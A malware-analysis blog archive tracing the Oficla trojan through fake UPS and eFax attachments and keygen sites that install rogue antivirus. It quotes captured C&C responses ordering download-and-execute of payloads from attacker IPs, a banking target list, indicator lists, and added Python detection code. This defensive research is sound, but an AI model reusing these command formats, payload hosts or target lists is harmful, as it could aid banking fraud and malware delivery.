Tag Archives: oficla trojan

Fake UPS ZIP Attachments Spreads Oficla Trojan

Some users have submitted a few malware samples to us, received as attachments to fake UPS spam emails. The files are ZIP archives containing an executable that uses the same icon as Microsoft Word documents:

Extracted EXE File

File: Label_UPS_Nr11373.exe
Size: 60928 bytes
Publisher: WUsBjuKspHvMxtas
MD5 hash: ed691cabda1bc5f8447d747558f8b64e
SHA1 hash: 73dee84ca24c24533fdda34e958c4c4c2f635ddf
Detection rate: 5 on 16 (31%)
Status: INFECTED

Files created after the execution of the EXE file:

Files Created

File name: svrwsc-exe
File size: 62464 bytes
MD5 hash: c5ebdc1c45aec27d935a30e74197d402
SHA1 hash: 44c56444557870316389b86c10343beea3245af1
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: sbxj-lyo
File size: 21504 bytes
MD5 hash: a0528b57e251657ce64e79acfcb45c0a
SHA1 hash: 15df2b7cfda011876e5a3bfca6014390c1b16a2b
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: ex-08-exe
File size: 259072 bytes
MD5 hash: 3996c77ef6a0b4f365f4d8297bd46c44
SHA1 hash: 05c869267cff02ad999c08565fbe1f266c91a9c0
Detection rate: 2 on 16 (13%)
Status: INFECTED

The file created in the system directory is named sbxj.lyo; it is the main executable of the Oficla trojan, which is used to control the victim’s computer and to install the rogue security software named Security Tool.

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/morph.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:45 GMT
Content-Disposition: attachment; filename="morph.exe"
Content-Transfer-Encoding: binary
Content-Length: 62464
Content-Type: application/octet-stream

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/69.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:47 GMT
Content-Disposition: attachment; filename="69.exe"
Content-Transfer-Encoding: binary
Content-Length: 15360
Content-Type: application/octet-stream

From the above network traffic we can see that the main executable of the Oficla trojan has started receiving commands from the C&C server: download two new malicious executables, named morph.exe and 69.exe, and execute the newly downloaded files on the victim’s computer.

Network Traffic:

GET /avpsoft_dfhljkghsdflg.exe HTTP/1.0
Host: 188.65.74.163

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:57:46 GMT
Content-Type: application/octet-stream
Content-Length: 987648
Last-Modified: Wed, 20 Oct 2010 15:57:32 GMT

The file avpsoft_dfhljkghsdflg.exe is the executable of the rogue security software, named Security Tool, that will be installed on our infected system. After its execution, we noticed new popup windows come up:

Popup Window

Security Tool has been fully installed:

Security Tool GUI

Files created during the installation of Security Tool:

Documents and Settings\user\Local Settings\Application Data\2730621030.exe
Documents and Settings\user\Start Menu\Programs\Security Tool.lnk

File name: 2730621030-exe
File size: 987648 bytes
MD5 hash: 493366362d69acf11996d96e33fabd65
SHA1 hash: 5f3a4dbb6a139c21eac250e61587562d1e24ac82
Detection rate: 2 on 16 (13%)
Status: INFECTED

Network Traffic:

POST /us/federal/index.php HTTP/1.0
Accept: */*
Host: padreim. ru

Response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6191
 
.%......L.....*ebc_ebc1961*......*cibng.ibanking-services.com*......*springbankconnect.com*......*ibanking-services.com*......*mystreetscape.com*......*/inets/Login*......*business.macu.com*......*cnbsec1.cnbank.com*..
...*cnbank.com*......*scottvalleybank*......*hillsbank*..
...*efirstbank*......*addisonavenue.com*......*secure.fundsxpress.com*......*site-secure.com*......*umpquabank.com*......*fundsxpress.com*......*mystreetscape*......*treasurypathways.com*......*secure.ally.com*......*bankonline.umpquabank.com*......*servlet/teller*..
...*nsbank.com*......*comerica.com*......*cashmgt.firsttennessee*......*securentry.calbanktrust.com*..
...*securentry*......*express.53.com*......*homebank.nbg.gr*......*online.ccbank.bg*......*hsbc*......*ebanking.eurobank.gr*......*itreasury.regions.com*......*/Common/SignOn/Start.asp*......*wellsoffice.wellsfargo.com*......*chsec.wellsfargo.com*..
...*telepc.net*......*ceowt.wellsfargo.com*......*enterprise2.openbank.com*......*global1.onlinebank.com*..
...*webexpress*......*/sbuser/*..
...*webcash*......*www2.firstbanks.com/olb*..
...*bxs.com*......*PassMarkRecognized.aspx*......*businesslogin*..
...*hbcash.exe*......*otm.suntrust.com*......*wire*......*ACH*..
...*/inets/*..
...*corpACH*......*wcmfd/wcmpw/*..	...*/IBWS/*......*/ibs.*..
...*/livewire/*..	...*/olbb/*......*singlepoint.usbank.com*......*bolb.associatedbank.com*..*...*fnfgbusinessonline.enterprisebanker.com*......*lakecitybank.webcashmgmt.com*..
...*/inets/*......*bob.sovereignbank.com

The malware wants to filter domains related to online-banking accounts; the response is a list of wildcard patterns for banking hosts and login paths…
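As an added example (not the blog's own code), the following Python extracts the wildcard patterns from a response like the one quoted above and checks URLs against them, so a defender can tell whether a given banking site or login path is on the list. The real response is binary and the post renders its unprintable bytes as dots, so the blob below is a constructed reconstruction that uses a handful of the quoted patterns with NUL bytes standing in for the separators. The function names are mine, and treating the `*` entries as case-insensitive substring matches is an assumption about how the bot applies them.

```python
"""Extract the wildcard target list from the quoted C&C response and check
URLs against it. Added example, not the blog's own code."""
import re

# Constructed sample: a fragment of the target list as raw bytes, with NUL
# bytes in place of the unprintable framing the post shows as dots.
SAMPLE_BLOB = (
    b"\x00%\x00\x00\x00\x00\x00\x00L\x00\x00\x00\x00\x00"
    b"*ebc_ebc1961*\x00\x00\x00\x00\x00\x00"
    b"*cibng.ibanking-services.com*\x00\x00\x00\x00\x00\x00"
    b"*/inets/Login*\x00\x00\x00\x00\x00\x00"
    b"*wellsoffice.wellsfargo.com*\x00\x00\x00\x00\x00\x00"
    b"*ACH*\x00\x00"
)

# A run of two or more printable ASCII bytes; the bytes between runs are framing.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{2,}")


def extract_patterns(blob: bytes) -> list:
    """Return the wildcard patterns in order of appearance: every printable
    run that contains a '*' (stray single printable bytes are ignored)."""
    return [run.decode("ascii") for run in PRINTABLE_RUN.findall(blob) if b"*" in run]


def pattern_to_regex(pattern: str, ignore_case: bool = True):
    """Compile a '*'-wildcard pattern to an anchored regex: '*' matches any
    run of characters, everything else is literal.
    Case-insensitive matching is an assumption, not something the post states."""
    parts = [re.escape(p) for p in pattern.split("*")]
    flags = re.IGNORECASE if ignore_case else 0
    return re.compile("^" + ".*".join(parts) + "$", flags)


def matching_patterns(url: str, patterns, ignore_case: bool = True) -> list:
    """Return the patterns from the list that match the given URL."""
    return [p for p in patterns if pattern_to_regex(p, ignore_case).match(url)]


def targeted_hosts(patterns) -> list:
    """Pull out the entries that are bare hostnames (contain a dot, no path
    part) so a bank or enterprise can check its own domains against the list."""
    hosts = set()
    for p in patterns:
        s = p.strip("*")
        if "." in s and "/" not in s and "*" not in s:
            hosts.add(s)
    return sorted(hosts)


if __name__ == "__main__":
    pats = extract_patterns(SAMPLE_BLOB)
    print(pats)
    print(targeted_hosts(pats))
    for url in ("https://wellsoffice.wellsfargo.com/portal/signon",
                "https://bank.example.com/inets/Login",
                "https://www.example.com/reach.html"):
        print(url, "->", matching_patterns(url, pats))
```

Short patterns such as `*ACH*` show why the list is so broad: under case-insensitive matching it fires on any URL containing "ach", so the bot captures far more traffic than the named banking hosts alone.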

Network Traffic:

GET /outlook.exe HTTP/1.0
Host: 109.196.143.135

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.34
Date: Wed, 20 Oct 2010 15:57:51 GMT
Content-Type: application/octet-stream
Content-Length: 259072
Last-Modified: Wed, 20 Oct 2010 15:08:46 GMT
Accept-Ranges: bytes

Security Tool tries to connect to a fraudulent payment system:

GET /buy.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: fastpayform. biz

The title of the HTML page is:

<title>Security Tool - Payment Page</title>

Network Traffic:

GET /cb_soft.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: 77.78.201.23

Domain & IP Analysis:

webauc. ru / 85.195.104.162
91.204.48.46 – –
188.65.74.163 – –
109.196.143.135 – –
fastpayform. biz / 195.3.145.46
77.78.201.23 – b201c23.pptp-gw51.cable-internet.GlobalNET.ba

eFax False Email Spreads Antimalware Doctor

This morning we received an interesting email from a fake eFax, with a suspicious ZIP archive (.ZIP) attached; the subject of the email stated that we had received a fax (“You’ve got a fax”). The strange part is that the ZIP file contains an executable file (.EXE) with the icon of MS Word.

Image

Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED

The details of the message source of the received emails are as follows:

Image

From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;

We have executed the file in our sandbox and this is the file activity:

Image

The file created in the system directory is named hyli.igo; it is the main executable of the Oficla trojan, which is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.

Network Traffic:

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru

Response:

[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]

The malware connected to the C&C server of the Oficla trojan to receive new commands from the bot owner. From the response to the GET query we can see that the malware received the command to update itself (“upd:1”) with a new binary located at the URL given in “backurls:”.
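The task responses quoted in this post and in the UPS post above share one format: `[info]key:value|key:value|...[/info]`, where `runurl` tells the bot to download and execute a file and `upd:1` with a `backurls` URL tells it to replace itself. As an added example (not the blog's own code), the Python below parses those responses into the actions the bot would take and flags the beacon requests that precede them, using two signals visible in the captures: the `bb.php` path with the `v`/`id`/`b`/`tm` query keys, and the User-Agent `Opera\9.64`, whose backslash a genuine Opera browser never sends. The sample strings are copied from the posts with the blog's `hxxp`/`XXX` defanging kept as-is; the function names are mine.

```python
"""Parse Oficla C&C task responses and flag the beacon requests that fetch
them. Added example, not the blog's own code."""
import re
from urllib.parse import parse_qs, urlsplit

INFO_RE = re.compile(r"\[info\](.*?)\[/info\]", re.S)
REQUEST_RE = re.compile(r"^(GET|POST)\s+(\S+)\s+HTTP/1\.[01]$")

# Query keys every beacon on the page carries; later beacons add tid and r.
BEACON_KEYS = {"v", "id", "b", "tm"}

# Constructed sample input: the three C&C responses quoted in the posts.
SAMPLE_RESPONSES = [
    "[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]",
    "[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]",
    "[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]",
]

# Constructed sample input: (request line, User-Agent) pairs as a proxy would log them.
SAMPLE_REQUESTS = [
    ("GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1", "Opera\\9.64"),
    ("GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1", "Opera\\9.64"),
    ("GET /index.html HTTP/1.1", "Opera/9.64"),       # benign: real Opera uses a slash
    ("GET /test/morph.exe HTTP/1.1", "Opera\\9.64"),  # payload fetch: UA anomaly only
]


def parse_task_response(body: str) -> dict:
    """Return the key:value fields between [info] and [/info] as a dict.

    Fields are '|'-separated; a value may itself contain ':' (URLs), so each
    field is split on its first colon only. Empty values (backurls:) map to ''.
    """
    m = INFO_RE.search(body)
    if not m:
        return {}
    fields = {}
    for item in m.group(1).split("|"):
        if not item:
            continue
        key, _, value = item.partition(":")
        fields[key.strip()] = value.strip()
    return fields


def tasks_from_response(body: str) -> list:
    """Translate a response into the actions described in the posts:
    runurl = download and execute; upd:1 plus a backurls URL = self-update."""
    f = parse_task_response(body)
    tasks = []
    if f.get("runurl"):
        tasks.append(("download-execute", f["runurl"]))
    if f.get("upd") == "1" and f.get("backurls"):
        tasks.append(("self-update", f["backurls"]))
    return tasks


def beacon_indicators(request_line: str, user_agent: str) -> list:
    """Return the indicators that mark a request as an Oficla beacon;
    an empty list means nothing matched."""
    hits = []
    m = REQUEST_RE.match(request_line.strip())
    if m:
        parts = urlsplit(m.group(2))
        keys = set(parse_qs(parts.query, keep_blank_values=True))
        if parts.path.endswith("/bb.php") and BEACON_KEYS <= keys:
            hits.append("bb.php-beacon")
    # The captures send 'Opera\9.64'; a genuine Opera UA reads 'Opera/9.64'.
    if user_agent.startswith("Opera\\"):
        hits.append("backslash-opera-ua")
    return hits


def scan_requests(requests) -> list:
    """Return [(request line, indicators)] for every request that matched."""
    flagged = []
    for line, ua in requests:
        hits = beacon_indicators(line, ua)
        if hits:
            flagged.append((line, hits))
    return flagged


if __name__ == "__main__":
    for body in SAMPLE_RESPONSES:
        print(parse_task_response(body), "->", tasks_from_response(body))
    for line, hits in scan_requests(SAMPLE_REQUESTS):
        print(line, hits)
```

The User-Agent check is the more durable of the two signals: the `bb.php` path and the query keys are operator choices that change between campaigns, whereas the malformed `Opera\` string is a property of the bot code itself.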

Now we notice that the Oficla trojan has started to download the Antimalware Doctor installer. We can see from the image below that it looks like an installer for Microsoft Windows Updates, but it will install the rogue security software Antimalware Doctor instead:

Image

Common symptoms of a rogue security software infection are the repeated false security alerts stating that the user’s system is infected by a large number of trojans; the user is then pushed to click the “Remove Threats” button, which opens the main program and runs a fake system scan:

Image

This is the main GUI of Antimalware Doctor:

Image

Task manager has also been disabled:

Image

New Network Traffic:

GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in
 
GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in
 
GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in
 
GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in

Antimalware Doctor started to display fake security alerts that redirect to the website used to purchase this rogue security software. Keep in mind that all the payment systems used by these rogues are fraudulent and in most cases can even steal the credit card details entered during the payment process:

GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in

SSL Connection used during payments:

83.133.115.9:443

Domain & IP Analysis:

moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9

Oficla Trojan spreads through keygens and software cracks

Here is a new list of dangerous domains, logged by our internal honeypots and submitted by users, that are used to spread trojans, rogue security software and other malicious threats; some of these domains still have a low detection rate as of today:

Rogue Security Software:

www4.checkpc96.co.cc / 209.212.149.23
www4.checkpc97.co.cc / 209.212.149.23
www4.checkpc98.co.cc / 209.212.149.23
www4.checkpc95.co.cc / 209.212.149.23
www4.checkpc94.co.cc / 209.212.149.23
www4.checkpc93.co.cc / 209.212.149.23
www1.makeptotect79.co.cc / 94.228.220.117
www1.makeptotect78.co.cc / 94.228.220.117
www1.makeptotect77.co.cc / 94.228.220.117
www1.makeptotect76.co.cc / 94.228.220.117
www1.makeptotect75.co.cc / 94.228.220.117
www1.makeptotect74.co.cc / 74.3.166.117
www1.makeptotect73.co.cc / 74.3.166.117
www1.makeptotect72.co.cc / 74.3.166.117
www1.makeptotect71.co.cc / 74.3.166.117
www1.makeptotect70.co.cc / 74.3.166.117

Trojan Distribution (Oficla/Renos):

gourlz.net / 178.63.3.138
thestockfiles.com / 69.10.36.218
vo2ov.com / 95.211.10.178
cvaohn.org / 209.123.181.48
mechadairysystems.com / 208.87.240.230
longsoft.org / 64.21.53.43
kenborden.com / 209.123.181.48
hotworldmedia.com / 69.10.36.218

Infected Websites:

absfixer.com/catalog/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
demo.itlinkonline.com/tcartz2/images/news.php?page=keyword (200 OK)
meyal.com/images/news.php?page=keyword (200 OK)
delisuper.com/images/page.php?page=keyword (200 OK)
antoniasecrets.com/catalog/images/news.php?page=keyword (200 OK)
ap2.dataoz.com/catalog/images/page.php?page=keyword (200 OK)
shylittle.com/catalog/images/page.php?page=keyword (200 OK)
dtechsac.com/tienda/images/news.php?page=keyword (200 OK)
cafetorredealba.com/images/news.php?page=keyword (200 OK)
donegalanglingcentre.com/shop/images/page.php?page=keyword (200 OK)
gravure3d.fr/catalog/images/page.php?page=keyword (200 OK)
exerciseelite.com/images/news.php?page=keyword (200 OK)
econdbike.it/negozio/images/news.php?page=keyword (200 OK)
seobrand.net/private_label/images/news.php?page=keyword (200 OK)

The IP address 209.123.181.48 (AS8001 – NAC Net Access Corp) appears to have hosted, and still to host, a very high number of malicious domains that are mostly used to distribute trojans disguised as keygens or cracks for popular commercial software:

allmusic.com.ua
amorphia.com.ua
artsofboreal.com
botaime.com
c-charts.com
cflor.org
creaweblog.com
cvaohn.org
digitaldepotstore.net
dwrz.com.ua
gsis-bro.com
imvu.com.ua
ineverforget.com
job-hotel.com.ua
k-p.km.ua
kenborden.com
loweimages.com
mail.allmusic.com.ua
mail.amorphia.com.ua
mail.artsofboreal.com
mail.creaweblog.com
mail.cvaohn.org
mail.digitaldepotstore.net
mail.dwrz.com.ua
mail.gsis-bro.com
mail.imvu.com.ua
mail.ineverforget.com
mail.job-hotel.com.ua
mail.k-p.km.ua
mail.kenborden.com
mail.maple-shion.net
mail.newlife3o.com
mail.obama4.in.ua
mail.obogreva.net
mail.pekinform.com.ua
mail.pill-flag.com
mail.ranta-kone.com
mail.serce.com.ua
mail.setite.com
mail.snak.vn.ua
mail.techwave.com.ua
mail.toptvproduct.ru
mail.ukreunov.com.ua
mail.xocit.com
mail.yazv.net
nasharu.org
newenglandgroup.us
newlife3o.com
ns1.obama4.in.ua
ns1.snak.kiev.ua
obama4.in.ua
pekinform.com.ua
pill-flag.com
ranta-kone.com
serce.com.ua
snak.vn.ua
techwave.com.ua
toptvproduct.ru
ukreunov.com.ua
www.botaime.com
www.dwrz.com.ua
www.ineverforget.com
www.loweimages.com
www.nasharu.org
www.xwarezzz.com
xwarezzz.com
yazv.net

Whois details for 209.123.181.48:

NetRange: 209.123.0.0 – 209.123.255.255
CIDR: 209.123.0.0/16
OriginAS: AS8001
NetName: NAC-NETBLK02
NetHandle: NET-209-123-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS2.NAC.NET
NameServer: NS1.NAC.NET
Comment: Additional Information Available via whois.nac.net
RegDate: 1997-08-06
Updated: 2007-09-18
Ref: http://whois.arin.net/rest/net/NET-209-123-0-0-1

OrgName: Net Access Corporation
OrgId: NAC
Address: 9 Wing Drive
City: Cedar Knolls
StateProv: NJ
PostalCode: 07927
Country: US
RegDate:
Updated: 2008-01-16
Ref: http://whois.arin.net/rest/org/NAC

OrgAbuseHandle: ABUSE156-ARIN
OrgAbuseName: Abuse Department
OrgAbusePhone: +1-800-638-6336
OrgAbuseEmail: XXXXX@nac.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE156-ARIN

The IP address 64.21.53.43 (AS8001 – NAC Net Access Corp) also appears to host malicious domains, in particular longsoft.org, which is used to distribute trojans by promising keygens and cracks for software:

Trojan spreading in action:

Image

Report 2010-08-19 15:09:47 (GMT 1)
File Name paragon.exe
File Size 135168 bytes
File Type Executable File (EXE)
MD5 Hash f1d62efaea0986dd6b8ef1eee470e8dc
SHA1 Hash 90f59e41ad56204390f58f34c61c4aea04538a31
Detections: 3 / 16 ( 19 %)
Status INFECTED

Trojan Activity:

POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /logos/XXX
Host: devtempest.com (91.188.60.233)
 
POST /98ds7c98ds7c98ds7c98.php?ini=
Host: duidrive.net (64.20.63.58)
 
POST /werber/34b520e6b47/217.gif HTTP/1.1
Host: mybubblebean.com (85.234.190.47)
 
POST /perce/XXX
Host: peribox.net (77.78.239.42)

64.21.53.43 (AS8001 – NAC Net Access Corp)

longsoft.org
mail.longsoft.org
mail.real-downloads.net
mail.thenewamsterdams.net
mail.web-zik.com
real-downloads.net
web-zik.com

69.10.36.218 (AS19318 – NJIIX.net 110B Meadowlands Pkwy Secaucus)

mediaidentifier.com
movieregion.com
multimedianame.com
ns1.prominentupstairs.com
realplayerpro.com
yourreload.com

178.63.3.138 (AS24940 – Hetzner Online AG RZ)

gourlz.net
aevitasecuritystore.com
atzan.com
buydedicated.ru
buyvps.ru
ddiscompstore.com
de2.reserver.ru
erosik.com
fasturls.net
finmill.com
funnyseo.biz
hentaix.ru
humorarchive.info
jaguarconsultant.com
keygen-crack.net
kino2012.ru
kinovam.com
mail.all4-sex.info
marconmedia.com
ns1.buydedicated.ru
photo63.www.vk.com.www2in.net
serialpost.net
sey.su
softwareserialnumbers.net
soshinenie.ru
trusted-warez.com
vadoz.ru
www.erosik.com
www.photo63.www.vk.com.www2in.net
www.soshinenie.ru
www.xmancer.org
www2in.net
xmancer.org

208.87.240.230 (AS40676 – Proxy registration for downstream)

bigbizoo.net
grosskopf.net
grrrey.com
mail.konseed.org
mail.richfootball.net
ns1.richfootball.net
ns2.richfootball.net
pixelfish.net
richfootball.net
setite.com
theapps.org
www.setite.com
xocit.com

217.23.5.74 (AS49981 – WorldStream)

billgable.com
dlov.org
softwareshare.org
techrev.net

8.14.147.235 (AS26481 – BONDWEB Bondweb)

directdownloads.ws
loaded.ws
mail.directdownloads.ws
mail.loaded.ws
mail.skinnyrons.com
mail.unlimitedserials.com
skinnyrons.com
unlimitedserials.com
warez411.com
loaded.ws
unlimitedserials.com
warez411.com
unlimitedserials.com

69.55.50.102 (AS23393 – ISPRIME , Inc.)

downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
kevin.internal.realitychecknetwork.com
mail.fulldownload.ws
rcn560.realitychecknetwork.com
sharingaccess.com
downloadwarez.org
filereleases.com
fulldownload.ws
fullrapidshare.com
fullreleases.ws
fullversions.org
sharingaccess.com
sharingnova.com

We will stop here for now, but the list is very long!